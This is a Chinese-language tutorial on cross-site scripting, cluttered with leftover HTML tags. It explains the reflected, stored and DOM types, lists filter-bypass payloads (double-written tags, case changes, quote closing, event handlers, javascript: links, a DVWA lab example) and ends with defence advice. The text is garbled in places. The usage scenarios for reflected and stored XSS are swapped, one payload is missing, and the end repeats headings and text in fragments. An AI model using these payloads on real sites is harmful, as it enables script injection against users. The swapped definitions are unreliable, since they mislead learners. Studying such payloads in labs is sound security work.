XSS跨站脚本攻击漏洞详解<\/h1>

一、XSS基本概念<\/h2>
XSS（Cross Site Scripting，跨站脚本攻击）是指恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页时，嵌入其中的Script代码会被执行，从而达到恶意攻击用户的目的。<\/p>

关键特征：<\/h3>

通过PHP的输出函数将Javascript代码输出到HTML页面中<\/li>
在用户本地浏览器执行<\/li>

漏洞关键点：寻找参数未过滤的输出函数<\/li> <\/ul>

常见PHP输出函数：<\/h3>

echo, printf, print, print_r, sprintf, die, var_dump, var_export
<\/code><\/pre>
二、XSS分类<\/h2>
1. 反射型XSS<\/h3>

特点：不持久化，仅对当前访问有效<\/li>
常见场景：留言板、用户发帖、用户回帖<\/li>
数据流：经过后端但不过数据库<\/li>
<\/ul>
2. 存储型XSS<\/h3>

特点：持久化，存储在服务器上<\/li>
常见场景：URL、搜索框、GET\/POST参数<\/li>
数据流：经过后端同时经过数据库<\/li>
<\/ul>
3. DOM型XSS<\/h3>

特点：基于DOM文档对象模型<\/li>
关键特征：不与后台服务器产生数据交互<\/li>
形成方式：通过前端的DOM节点形成的漏洞<\/li>
<\/ul>
三、XSS Payload构造与绕过技术<\/h2>
1. 反射型XSS Payload示例<\/h3>

常规Payload：<\/li>
<\/ul>
<script<\/span>>alert<\/span>(1<\/span>)<\/script<\/span>>
<\/span><\/span><\/code><\/pre>
双写绕过：<\/li>
<\/ul>
<sc<\/span><<\/span>script<\/span>>alert(1)<\/script<\/span>>
<\/span><\/span><\/code><\/pre>
大小写绕过（随机选择改写）：<\/li>
<\/ul>
<Script<\/span>>alert<\/span>(1<\/span>)<\/script<\/span>>
<\/span><\/span><\/code><\/pre>
``绕过（过滤掉了<><\/code>和script<\/code>）：<\/li>
<\/ul>

<\/span><\/span><\/code><\/pre>2. 存储型XSS实战技巧<\/h3>

当输入框长度受限时：

打开开发者工具(F12)<\/li>
定位到输入框元素<\/li>
修改maxlength<\/code>属性值<\/li>
输入更长的恶意代码<\/li>
<\/ol>
<\/li>
<\/ul>
3. DOM型XSS绕过示例<\/h3>
以DVWA靶场Medium级别为例：<\/p>

原始URL参数：default=English<\/code><\/li>
尝试替换为JS语句但被过滤<\/li>
查看源代码发现过滤逻辑：<\/li>
<\/ul>
if<\/span> (stripos<\/span> ($default, "<script"<\/span>) !==<\/span> false<\/span>) {
<\/span><\/span>    header<\/span> ("location: ?default=English"<\/span>);
<\/span><\/span>    exit<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
有效Payload：<\/li>
<\/ul>
><\/option<\/span>><\/select<\/span>>
<\/span><\/span><\/code><\/pre>四、针对各种过滤的绕过方法总结<\/h2>
1. 未过滤任何参数<\/h3>
<script<\/span>>alert<\/span>()<\/script<\/span>>
<\/span><\/span>
<\/span><\/span><\/code><\/pre>2. Payload被引号包裹<\/h3>
例如：<\/p>
<input<\/span> name<\/span>=<\/span>keyword<\/span> value<\/span>=<\/span>"<script>alert()<\/script>"<\/span>>
<\/span><\/span><\/code><\/pre>
闭合标签和字符串<\/strong>：<\/li>
<\/ul>
"><script<\/span>>alert<\/span>()<\/script<\/span>>"
<\/span><\/span><\/code><\/pre>
添加属性和方法<\/strong>：<\/li>
<\/ul>
" onclick=alert() type="text"
<\/span><\/span><\/code><\/pre>3. Payload被更改（如script→scr_ipt）<\/h3>

使用a标签绕过：<\/li>
<\/ul>
"><a<\/span> href<\/span>=<\/span>javascript:alert()<\/span>>点击<\/a<\/span>>
<\/span><\/span><\/code><\/pre>4. Payload被更改但不要求大小写<\/h3>
Onclick=alert() type="text"
<\/span><\/span><\/code><\/pre>5. Payload关键字被清除<\/h3>

双写绕过技术：<\/li>
<\/ul>
<scrscriptipt<\/span>>alert()<\/sscriptcript<\/span>>
<\/span><\/span><\/code><\/pre>五、防御建议<\/h2>

对所有用户输入进行严格的过滤和转义<\/li>
使用Content Security Policy (CSP)<\/li>
对输出到HTML的内容进行HTML编码<\/li>
对输出到JavaScript的内容进行JavaScript编码<\/li>
对输出到URL的内容进行URL编码<\/li>
使用HttpOnly标志限制Cookie访问<\/li>
<\/ol>
通过理解这些XSS攻击技术和防御方法，开发者可以更好地保护Web应用免受跨站脚本攻击的威胁。<\/p>

XSS跨站脚本攻击漏洞详解<\/h1>

一、XSS基本概念<\/h2> XSS（Cross Site Scripting，跨站脚本攻击）是指恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页时，嵌入其中的Script代码会被执行，从而达到恶意攻击用户的目的。<\/p>

二、XSS分类<\/h2>

三、XSS Payload构造与绕过技术<\/h2>

四、针对各种过滤的绕过方法总结<\/h2>

一、XSS基本概念<\/h2>
XSS（Cross Site Scripting，跨站脚本攻击）是指恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页时，嵌入其中的Script代码会被执行，从而达到恶意攻击用户的目的。<\/p>